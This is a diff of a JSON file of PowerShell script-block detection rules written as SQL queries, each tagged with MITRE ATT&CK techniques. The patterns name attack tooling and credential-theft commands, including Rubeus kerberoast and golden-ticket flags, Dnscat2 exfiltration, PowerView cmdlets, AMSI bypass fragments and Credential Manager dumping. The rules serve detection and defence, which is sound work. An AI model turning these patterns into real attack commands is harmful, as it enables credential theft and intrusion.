"description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.t1136.002" + ], + "falsepositives": [ + "Legitimate administrative script" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + ], + "filename": "posh_ps_directoryservices_accountmanagement.yml" }, { - "title": "Powershell Sensitive File Discovery", - "id": "7d416556-6502-45b2-9bad-9d2f05f38997", - "status": "experimental", - "description": "Detect adversaries enumerate sensitive files", - "author": "frack113", + "title": "Dnscat Execution", + "id": 
"a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.pass%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdbx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.kdb%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "posh_ps_sensitive_file_discovery.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Dump Credentials from Windows Credential Manager With PowerShell", - "id": "99c49d9c-34ea-45f7-84a7-4751ae6b2cbc", + "title": "Remove Account From Domain Admin Group", + "id": "48a45d45-8112-416b-8a67-46e03a4b2107", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", + "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", "author": 
"frack113", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.impact", + "attack.t1531" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-PasswordVaultCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CredManCreds%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Windows.Security.Credentials.PasswordVault%' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Microsoft.CSharp.CSharpCodeProvider%' ESCAPE '\\' AND ScriptBlockText LIKE '%[System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory())%' ESCAPE '\\' AND ScriptBlockText LIKE '%Collections.ArrayList%' ESCAPE '\\' AND ScriptBlockText LIKE '%System.CodeDom.Compiler.CompilerParameters%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" ], - "filename": "posh_ps_dump_password_windows_credential_manager.yml" + "filename": "posh_ps_susp_remove_adgroupmember.yml" }, { - "title": "Powershell Directory Enumeration", - "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", - "status": "test", - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "title": "Suspicious GetTypeFromCLSID ShellExecute", + "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "status": "experimental", + "description": "Detects suspicious Powershell code that execute COM Objects", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1083" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" ], 
"falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_directory_enum.yml" + "filename": "posh_ps_susp_gettypefromclsid.yml" }, { - "title": "Suspicious PowerShell WindowStyle Option", - "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "status": "test", - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "author": "frack113, Tim Shelton (fp AWS)", - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ], + "title": "Suspicious X509Enrollment - Ps Script", + "id": "504d63cb-0dba-4d02-8531-e72981aace2c", + "status": "experimental", + "description": "Detect use of X509Enrollment", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' 
ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR ScriptBlockText LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_windowstyle.yml" + "filename": "posh_ps_x509enrollment.yml" }, { - "title": "Get-ADUser Enumeration Using UserAccountControl Flags", - "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", - "status": "test", - "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", - "author": "frack113", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" + "SELECT * FROM logs WHERE 
(EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "posh_ps_as_rep_roasting.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "Powershell Detect Virtualization Environment", - "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", - "status": "test", - "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", - "author": "frack113, Duc.Le-GTSC", + "title": "Windows Defender Exclusions Added - PowerShell", + "id": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "status": "experimental", + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "author": "Tim Rauch", "tags": [ "attack.defense_evasion", - "attack.t1497.001" + "attack.t1562", + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = 
'4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -ExclusionPath %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionExtension %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionProcess %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ExclusionIpAddress %' ESCAPE '\\') AND (ScriptBlockText LIKE '%Add-MpPreference %' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MpPreference %' ESCAPE '\\'))" ], - "filename": "posh_ps_detect_vm_env.yml" + "filename": "posh_ps_win_defender_exclusions_added.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.execution" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND ScriptBlockText LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%NonPublic,Static%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "posh_ps_amsi_bypass_pattern_nov22.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Remove Account From Domain Admin 
Group", - "id": "48a45d45-8112-416b-8a67-46e03a4b2107", + "title": "Powershell WMI Persistence", + "id": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", "status": "test", - "description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users.\nAccounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.\n", + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", "author": "frack113", "tags": [ - "attack.impact", - "attack.t1531" + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-ADGroupMember%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Identity %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Members %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName \\_\\_EventFilter %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\') OR (ScriptBlockText LIKE '%New-CimInstance %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namespace root/subscription %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ClassName CommandLineEventConsumer %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Property %' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_remove_adgroupmember.yml" + "filename": "posh_ps_wmi_persistence.yml" }, { - "title": "Suspicious PowerShell Mailbox Export to Share - PS", - "id": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "status": 
"experimental", - "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Get-ADReplAccount", + "id": "060c3ef1-fd0a-4091-bf46-e7d625f60b73", + "status": "test", + "description": "The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory.\nThese include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.\n", + "author": "frack113", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-MailboxExportRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -FilePath \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADReplAccount%' ESCAPE '\\' AND ScriptBlockText LIKE '%-All %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Server %' ESCAPE '\\')" ], - "filename": "posh_ps_mailboxexport_share.yml" + "filename": "posh_ps_get_adreplaccount.yml" }, { - "title": "Execution via CL_Invocation.ps1 - Powershell", - "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", - "status": "experimental", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious Unblock-File", + "id": "5947497f-1aa4-41dd-9693-c9848d58727d", + "status": "test", + "description": "Remove the 
Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1553.005" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Unblock-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\')" ], - "filename": "posh_ps_cl_invocation_lolscript.yml" + "filename": "posh_ps_susp_unblock_file.yml" }, { - "title": "Change PowerShell Policies to an Insecure Level - PowerShell", - "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "status": "experimental", - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "title": "Suspicious Start-Process PassThru", + "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "status": "test", + "description": "Powershell use PassThru option to start in background", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.003" ], "falsepositives": [ - "Administrator script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object 
System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml" + "filename": "posh_ps_susp_start_process.yml" }, { - "title": "PowerShell Write-EventLog Usage", - "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate applications writing events via this cmdlet. 
Investigate alerts to determine if the action is benign" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_write_eventlog.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "PowerShell Create Local User", - "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", - "status": "test", - "description": "Detects creation of a local user via PowerShell", - "author": "@ROxPinTeddy", + "title": "Potential Suspicious Windows Feature Enabled", + "id": "55c925c1-7195-426b-a136-a9396800e29b", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image 